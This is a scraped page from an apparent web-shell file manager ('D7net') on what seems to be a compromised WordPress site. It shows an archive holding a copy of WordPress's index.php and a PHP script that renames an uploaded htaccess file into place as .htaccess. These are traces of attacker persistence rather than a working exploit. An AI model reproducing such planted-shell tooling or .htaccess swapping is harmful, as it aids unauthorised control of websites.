D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
home
/
mybf1
/
www
/
mentol.bf1.my
/
Filename :
x.tar
back
Copy
x.php 0000644 00000000625 15120361712 0005525 0 ustar 00 <?php /** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */ /** * Tells WordPress to load the WordPress theme and output it. * * @var bool */ define( 'WP_USE_THEMES', true ); /** Loads the WordPress Environment and Template */ require __DIR__ . '/wp-blog-header.php'; mv.php 0000644 00000000716 15120361712 0005701 0 ustar 00 <?php $old_name = 'htaccess'; $new_name = '.htaccess'; // Cek apakah file htaccess ada if (file_exists($old_name)) { // Ubah nama file if (rename($old_name, $new_name)) { echo "â Nama file '$old_name' berhasil diubah menjadi '$new_name'."; } else { echo "â Gagal mengubah nama file '$old_name' menjadi '$new_name'. Periksa izin (permissions) direktori."; } } else { echo "âšī¸ File '$old_name' tidak ditemukan."; } ?>